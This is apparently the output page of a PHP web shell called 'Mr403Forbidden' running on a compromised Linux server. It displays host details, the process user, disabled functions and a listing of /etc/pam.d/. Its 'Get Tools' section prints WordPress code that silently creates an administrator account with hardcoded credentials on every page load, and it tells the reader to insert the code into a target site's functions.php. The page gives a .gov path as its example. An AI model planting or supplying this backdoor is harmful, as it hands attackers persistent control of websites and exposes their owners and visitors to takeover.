./Mr403Forbidden

:/etc/pam.d/ [ drwxr-xr-x ]

System: Linux 94.45.167.72.host.secureserver.net 4.18.0-553.120.1.el8_10.x86_64 #1 SMP Mon Apr 20 18:04:27 EDT 2026 x86_64
Software: Apache
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 172.67.145.68
Your IP: 216.73.216.150
User: godevadmin (1035) | Group: godevadmin (1013)
Safe Mode: OFF
MYSQL: OFF | PERL: OFF | PYTHON: OFF | WGET: OFF | CURL: ON | GCC: OFF | PKEXEC: OFF
Disable Function:
exec,passthru,shell_exec,system

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = '[email protected]';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
atd file 2024-08-07 14:27 272 B root/root -rw-r--r--
chfn file 2026-04-29 12:20 342 B root/root -rw-r--r--
chsh file 2026-04-29 12:20 342 B root/root -rw-r--r--
config-util file 2025-12-17 18:54 232 B root/root -rw-r--r--
crond file 2024-08-07 14:27 322 B root/root -rw-r--r--
dovecot file 2026-02-03 19:31 157 B root/root -rw-r--r--
exim file 2026-02-03 18:25 116 B root/root -rw-r--r--
fingerprint-auth file 2024-08-07 14:27 140 B root/root -rw-r--r--
login file 2026-02-04 20:18 715 B root/root -rw-r--r--
other file 2025-12-17 18:54 154 B root/root -rw-r--r--
passwd file 2024-08-07 14:27 168 B root/root -rw-r--r--
password-auth file 2024-08-07 14:27 1.94 KB root/root -rw-r--r--
polkit-1 file 2024-08-07 14:27 155 B root/root -rw-r--r--
postgresql_cpses file 2024-08-07 14:27 70 B root/root -rw-r--r--
postlogin file 2024-08-07 14:27 397 B root/root -rw-r--r--
pure-ftpd file 2025-06-06 14:14 466 B root/root -rw-r--r--
remote file 2026-02-04 20:18 640 B root/root -rw-r--r--
runuser file 2026-02-04 20:18 143 B root/root -rw-r--r--
runuser-l file 2026-02-04 20:18 138 B root/root -rw-r--r--
screen file 2021-05-05 10:02 36 B root/root -rw-r--r--
smartcard-auth file 2024-08-07 14:27 140 B root/root -rw-r--r--
sshd file 2026-04-29 12:20 766 B root/root -rw-r--r--
sssd-shadowutils file 2024-08-07 14:27 240 B root/root -rw-r--r--
su file 2026-02-04 20:18 566 B root/root -rw-r--r--
su-l file 2026-02-04 20:18 137 B root/root -rw-r--r--
sudo file 2025-12-18 14:01 154 B root/root -rw-r--r--
sudo-i file 2025-12-18 14:01 178 B root/root -rw-r--r--
system-auth file 2024-08-07 14:27 1.94 KB root/root -rw-r--r--
systemd-user file 2026-03-04 8:03 368 B root/root -rw-r--r--
vlock file 2024-08-07 14:27 84 B root/root -rw-r--r--

© ./Mr403Forbidden